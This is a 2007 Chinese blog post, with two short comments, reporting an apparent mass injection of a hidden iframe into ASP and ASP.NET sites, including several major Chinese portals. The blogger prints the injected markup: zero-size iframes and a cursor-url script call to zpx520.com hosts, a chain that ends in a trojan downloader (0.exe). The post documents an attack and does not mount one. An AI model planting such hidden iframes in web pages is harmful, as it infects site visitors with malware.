ASP(.NET)漏洞爆发?

May 11th, 2007 Anything BLOGGING

Q3ACN首页上点右键,查看源代码,第一行:
<iframe src=‘http://www.zpx520.com/0.htm’ width=0 height=0></iframe>

目前似乎很多asp、asp.net网站都被注入这个了。
上午的时候看单位网站出了这个问题,网上资料还不很多,而且也都是这两天报告的木马,还没有肯定的解答。
找到我们网站源程序,动易首页有这个,然后去sfile,发现也有这个,感觉不大对头了。
刚看了下ACN首页(ASP.NET),寒,也有……

然后接着去查了几个大站,一半以上中招(还不能肯定是不是都用的ASP,但看起来没有PHP中招):
  新华网:http://www.xinhua.org/
  网易:http://www.163.com/
  东方网:http://www.eastday.com/
  TOM:http://www.tom.com/
  搜狐:http://www.sohu.com/
甚至还包括瑞星和卡卡社区:
  瑞星网站:http://www.rising.com.cn/
  卡卡社区:http://www.ikaka.com/

这个0.htm代码如下:

<iframe src=‘http://www.zpx520.com/0.htm’ width=0 height=0>

<HTML>
<BODY style=‘CURSOR: url(http://q.zpx520.com/w.js)’>
</BODY>
</HTML>
<iframe src=“http://q.zpx520.com/1.htm” width=“0” height=“0” frameborder=“0”>

<script src=‘http://s111.cnzz.com/stat.php?id=430086&web_id=430086’ language=‘JavaScript’ charset=‘gb2312’>

<script src=‘http://s61.cnzz.com/stat.php?id=474270&web_id=474270’ language=‘JavaScript’ charset=‘gb2312’>

顺着JS追下去,最后是要下载这个程序:http://w.zpx520.com/0.exe
瑞星说这是Trojan.DL.Small.vax……但是瑞星网站上没有,Google 也搜索不出来 —___—
剩下的我就不管了,反正我的 Blog 没事儿,嘿嘿

2 Responses to “ASP(.NET)漏洞爆发?”

  1. says:
    2007/05/22 at 15:09

    你自己的网站中病毒拉.哈哈

  2. amor mio says:
    2007/05/23 at 11:23

    啊?不是吧?刚看了下没有中毒吧?

Leave a Reply